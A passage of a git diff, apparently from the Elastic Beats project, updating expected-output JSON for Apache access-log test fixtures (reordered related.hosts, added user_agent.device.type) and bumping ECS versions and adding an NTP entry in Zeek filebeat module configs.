Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -3629,9 +3686,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "www5.example.org", + "https://www5.example.org/setquas/minim.gif?tutlabor=reseosq#gna", "mail.example.net", - "https://www5.example.org/setquas/minim.gif?tutlabor=reseosq#gna" + "www5.example.org" ], "related.ip": [ "10.94.140.77" @@ -3668,6 +3725,7 @@ "url.top_level_domain": "org", "user.name": "isnisiu", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -3689,9 +3747,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.com/laudanti/umiurer.txt?rsitvolu=mnisi#usmo", "mail.example.org", - "www.example.com" + "www.example.com", + "https://www.example.com/laudanti/umiurer.txt?rsitvolu=mnisi#usmo" ], "related.ip": [ "10.223.205.204" @@ -3728,6 +3786,7 @@ "url.top_level_domain": "com", "user.name": "ccaec", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -3752,9 +3811,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "example.com", "mail.example.org", "https://mail.example.org/ici/nisiuta.jpg?itae=dtempo#atnula", - "example.com", "tautfug689.localdomain" ], "related.ip": [ @@ -3794,6 +3853,7 @@ "url.top_level_domain": "org", "user.name": "serror", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3818,9 +3878,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "www5.example.net", "mail.example.com", "https://mail.example.com/eseruntm/lpaquiof.html?magnaal=uscip#umS", - "www5.example.net", "totam6886.api.localhost" ], "related.ip": [ @@ -3860,6 +3920,7 @@ "url.top_level_domain": "com", "user.name": "liquam", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3883,9 +3944,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "https://example.net/labori/porai.gif?utali=sed#xeac", "internal.example.org", - "example.net", - "https://example.net/labori/porai.gif?utali=sed#xeac" + "example.net" ], "related.ip": [ "10.158.6.52" @@ -3921,6 +3982,7 @@ "url.top_level_domain": "net", "user.name": "sed", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", @@ -3946,8 +4008,8 @@ "observer.vendor": "Apache", "related.hosts": [ "example.com", - "https://www5.example.org/orissu/fic.gif?ese=mmodoco#amni", "www5.example.org", + "https://www5.example.org/orissu/fic.gif?ese=mmodoco#amni", "tquo854.api.domain" ], "related.ip": [ @@ -3987,6 +4049,7 @@ "url.top_level_domain": "org", "user.name": "urerepre", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -4049,6 +4112,7 @@ "url.top_level_domain": "com", "user.name": "quas", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -4115,6 +4179,7 @@ "url.top_level_domain": "com", "user.name": "iti", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -4139,9 +4204,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.net/ntorever/pisciv.gif?eritq=rehen#ipsamvol", - "www.example.net", "example.com", + "www.example.net", + "https://www.example.net/ntorever/pisciv.gif?eritq=rehen#ipsamvol", "veniam1216.www5.invalid" ], "related.ip": [ @@ -4181,6 +4246,7 @@ "url.top_level_domain": "net", "user.name": "ugiat", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -4201,8 +4267,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "www5.example.com", "https://www5.example.com/quu/xeac.htm?abor=oreverit#scip", + "www5.example.com", "runtm5729.invalid" ], "related.ip": [ @@ -4242,6 +4308,7 @@ "url.top_level_domain": "com", "user.name": "ptate", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -4266,8 +4333,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www5.example.net", - "www.example.net", - "https://www.example.net/mini/Loremip.html?tur=atnonpr#ita" + "https://www.example.net/mini/Loremip.html?tur=atnonpr#ita", + "www.example.net" ], "related.ip": [ "10.187.152.213" @@ -4304,6 +4371,7 @@ "url.top_level_domain": "net", "user.name": "ventor", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -4329,8 +4397,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www.example.net", - "internal.example.net", "https://www.example.net/duntutla/lamco.txt?isci=Dui#reetdo", + "internal.example.net", "pta6012.www.local" ], "related.ip": [ @@ -4370,6 +4438,7 @@ "url.top_level_domain": "net", "user.name": "fugitse", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -4394,8 +4463,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www5.example.net", - "https://www5.example.net/tev/nre.html?occaeca=eturadip#ent", - "www5.example.org" + "www5.example.org", + "https://www5.example.net/tev/nre.html?occaeca=eturadip#ent" ], "related.ip": [ "10.86.123.33" @@ -4432,6 +4501,7 @@ "url.top_level_domain": "net", "user.name": "meum", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", @@ -4455,9 +4525,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www5.example.net/uamnih/nseq.txt?uidolo=umdolore#dmi", + "www5.example.net", "api.example.net", - "www5.example.net" + "https://www5.example.net/uamnih/nseq.txt?uidolo=umdolore#dmi" ], "related.ip": [ "10.6.112.183" @@ -4494,6 +4564,7 @@ "url.top_level_domain": "net", "user.name": "oluptat", "user_agent.device.name": "LM-V350", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -4519,8 +4590,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www5.example.org", - "https://example.net/umdolor/isiu.html?mmodi=snostr#eniamqu", "example.net", + "https://example.net/umdolor/isiu.html?mmodi=snostr#eniamqu", "orsi2109.internal.home" ], "related.ip": [ @@ -4559,6 +4630,7 @@ "url.top_level_domain": "net", "user.name": "idolo", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -4579,9 +4651,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "example.net", "example.org", "https://example.org/ibusBo/untincu.jpg?lesti=sintocca#mipsumqu", - "example.net", "quaeabil2539.www5.lan" ], "related.ip": [ @@ -4620,6 +4692,7 @@ "url.top_level_domain": "org", "user.name": "quide", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -4644,9 +4717,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "www5.example.net", "www5.example.org", "https://www5.example.org/magnaa/sumquiad.gif?oluptate=Duisa#consequa", + "www5.example.net", "aal1598.mail.host" ], "related.ip": [ @@ -4686,6 +4759,7 @@ "url.top_level_domain": "org", "user.name": "upta", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -4709,9 +4783,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "api.example.net", "www.example.org", - "https://www.example.org/evolup/rvelil.gif?eavolup=ipsumq#evit" + "https://www.example.org/evolup/rvelil.gif?eavolup=ipsumq#evit", + "api.example.net" ], "related.ip": [ "10.37.156.140" @@ -4748,6 +4822,7 @@ "url.top_level_domain": "org", "user.name": "olores", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -4769,9 +4844,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "www5.example.org", + "https://example.com/oremip/its.jpg?iavol=natuserr#ostrudex", "example.com", - "https://example.com/oremip/its.jpg?iavol=natuserr#ostrudex" + "www5.example.org" ], "related.ip": [ "10.121.225.135" @@ -4807,6 +4882,7 @@ "url.top_level_domain": "com", "user.name": "cin", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -4830,9 +4906,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "www.example.org", "mail.example.net", - "https://www.example.org/animid/upta.jpg?onnumqua=quioff#iuntN", - "www.example.org" + "https://www.example.org/animid/upta.jpg?onnumqua=quioff#iuntN" ], "related.ip": [ "10.123.68.56" @@ -4869,6 +4945,7 @@ "url.top_level_domain": "org", "user.name": "olore", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -4893,8 +4970,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "api.example.net", "https://api.example.net/itesse/expl.html?prehende=lup#tpers", + "api.example.net", "mail.example.net", "oid218.api.invalid" ], @@ -4935,6 +5012,7 @@ "url.top_level_domain": "net", "user.name": "evo", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -4959,9 +5037,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://example.net/deritinv/evelite.html?iav=odico#rsint", - "example.net", "example.com", + "example.net", + "https://example.net/deritinv/evelite.html?iav=odico#rsint", "sectetur2674.www5.test" ], "related.ip": [ @@ -5000,6 +5078,7 @@ "url.top_level_domain": "net", "user.name": "deomnisi", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -5024,8 +5103,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "api.example.net", "https://example.org/tseddoei/teursint.htm?remagnaa=lamcolab#ceroinB", + "api.example.net", "example.org", "sequatD4487.internal.localhost" ], @@ -5065,6 +5144,7 @@ "url.top_level_domain": "org", "user.name": "nimv", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -5088,9 +5168,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "api.example.org", "www5.example.com", - "https://www5.example.com/ciad/ugiatqu.gif?turveli=isciv#natus", - "api.example.org" + "https://www5.example.com/ciad/ugiatqu.gif?turveli=isciv#natus" ], "related.ip": [ "10.122.252.130" @@ -5127,6 +5207,7 @@ "url.top_level_domain": "com", "user.name": "mmo", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -5151,8 +5232,8 @@ "observer.vendor": "Apache", "related.hosts": [ "api.example.com", - "https://api.example.com/olore/ntutlab.htm?ameaquei=gnama#esciun", - "www.example.net" + "www.example.net", + "https://api.example.com/olore/ntutlab.htm?ameaquei=gnama#esciun" ], "related.ip": [ "10.195.152.53" @@ -5189,6 +5270,7 @@ "url.top_level_domain": "com", "user.name": "ute", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -5250,6 +5332,7 @@ "url.top_level_domain": "com", "user.name": "emUtenim", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -5274,9 +5357,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.org/oremi/ectobeat.gif?oreeu=uasiarch#Malor", "internal.example.net", "www.example.org", + "https://www.example.org/oremi/ectobeat.gif?oreeu=uasiarch#Malor", "nimadmin5630.localdomain" ], "related.ip": [ @@ -5316,6 +5399,7 @@ "url.top_level_domain": "org", "user.name": "nulapari", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5340,8 +5424,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://api.example.com/orsitam/tiset.jpg?ati=rauto#doloreeu", "api.example.com", + "https://api.example.com/orsitam/tiset.jpg?ati=rauto#doloreeu", "api.example.org", "sequuntu3563.internal.test" ], @@ -5382,6 +5466,7 @@ "url.top_level_domain": "com", "user.name": "iarchit", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -5405,9 +5490,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "internal.example.com", "https://example.org/rep/mveni.txt?utpers=num#ctetura", - "example.org" + "example.org", + "internal.example.com" ], "related.ip": [ "10.144.111.42" @@ -5443,6 +5528,7 @@ "url.top_level_domain": "org", "user.name": "vento", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -5504,6 +5590,7 @@ "url.top_level_domain": "net", "user.name": "ola", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", @@ -5529,8 +5616,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www.example.net", - "https://mail.example.com/ccusant/epteurs.htm?oidentsu=oditau#onsec", "mail.example.com", + "https://mail.example.com/ccusant/epteurs.htm?oidentsu=oditau#onsec", "tdolo2150.www.example" ], "related.ip": [ @@ -5570,6 +5657,7 @@ "url.top_level_domain": "com", "user.name": "iusmodi", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5594,9 +5682,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "internal.example.org", "mail.example.org", "https://mail.example.org/onemul/trudexe.txt?ura=oreeufug#Quisa", + "internal.example.org", "cinge6032.api.local" ], "related.ip": [ @@ -5636,6 +5724,7 @@ "url.top_level_domain": "org", "user.name": "tamr", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -5659,9 +5748,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "example.com", "https://example.com/lorese/olupta.jpg?onsec=idestl#litani", - "internal.example.org", - "example.com" + "internal.example.org" ], "related.ip": [ "10.51.52.203" @@ -5697,6 +5786,7 @@ "url.top_level_domain": "com", "user.name": "itame", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -5721,8 +5811,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "internal.example.net", "https://internal.example.net/llitani/uscipit.html?etcons=etco#iuntN", + "internal.example.net", "ende6053.local" ], "related.ip": [ @@ -5762,6 +5852,7 @@ "url.top_level_domain": "net", "user.name": "imipsa", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -5786,8 +5877,8 @@ "observer.vendor": "Apache", "related.hosts": [ "https://mail.example.net/ptat/mipsu.htm?eturadip=amquaera#rsitamet", - "example.net", - "mail.example.net" + "mail.example.net", + "example.net" ], "related.ip": [ "10.106.34.244" @@ -5824,6 +5915,7 @@ "url.top_level_domain": "net", "user.name": "nim", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -5886,6 +5978,7 @@ "url.top_level_domain": "org", "user.name": "ruredol", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -5910,8 +6003,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www.example.org", - "https://www.example.com/bori/dipi.gif?utf=dolor#dexe", - "www.example.com" + "www.example.com", + "https://www.example.com/bori/dipi.gif?utf=dolor#dexe" ], "related.ip": [ "10.2.38.49" @@ -5948,6 +6041,7 @@ "url.top_level_domain": "com", "user.name": "lor", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -5968,9 +6062,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "mail.example.com", "example.com", "https://example.com/iat/tqui.gif?utaliqui=emse#emqui", + "mail.example.com", "didun1193.example" ], "related.ip": [ @@ -6009,6 +6103,7 @@ "url.top_level_domain": "com", "user.name": "atisu", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -6033,9 +6128,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://example.com/caboN/imipsam.jpg?catcupid=ritquiin#quisnost", "example.com", "mail.example.com", + "https://example.com/caboN/imipsam.jpg?catcupid=ritquiin#quisnost", "apari2660.www5.lan" ], "related.ip": [ @@ -6074,6 +6169,7 @@ "url.top_level_domain": "com", "user.name": "teirured", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", @@ -6140,6 +6236,7 @@ "url.top_level_domain": "net", "user.name": "uira", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -6164,9 +6261,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "www.example.org", "https://www.example.org/roinBCSe/eetdolor.html?tla=iaconseq#sed", "api.example.com", - "www.example.org", "icer123.mail.example" ], "related.ip": [ @@ -6206,6 +6303,7 @@ "url.top_level_domain": "org", "user.name": "culp", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -6272,6 +6370,7 @@ "url.top_level_domain": "net", "user.name": "deFini", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -6296,8 +6395,8 @@ "observer.vendor": "Apache", "related.hosts": [ "api.example.net", - "https://internal.example.org/teturadi/radipi.gif?upidatat=mod#niamqui", - "internal.example.org" + "internal.example.org", + "https://internal.example.org/teturadi/radipi.gif?upidatat=mod#niamqui" ], "related.ip": [ "10.12.173.112" @@ -6334,6 +6433,7 @@ "url.top_level_domain": "org", "user.name": "mco", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", diff --git a/x-pack/filebeat/module/zeek/_meta/config.yml b/x-pack/filebeat/module/zeek/_meta/config.yml index cc4572f6874..dbe6012df6b 100644 --- a/x-pack/filebeat/module/zeek/_meta/config.yml +++ b/x-pack/filebeat/module/zeek/_meta/config.yml @@ -31,6 +31,8 @@ enabled: true notice: enabled: true + ntp: + enabled: true ntlm: enabled: true ocsp: diff --git a/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml b/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml index 66a028f309d..8acb8ca02f2 100644 --- a/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml +++ b/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml @@ -22,4 +22,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/connection/config/connection.yml b/x-pack/filebeat/module/zeek/connection/config/connection.yml index 71169efdf28..7f5fda3b4ed 100644 --- a/x-pack/filebeat/module/zeek/connection/config/connection.yml +++ b/x-pack/filebeat/module/zeek/connection/config/connection.yml @@ -102,4 +102,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml b/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml index 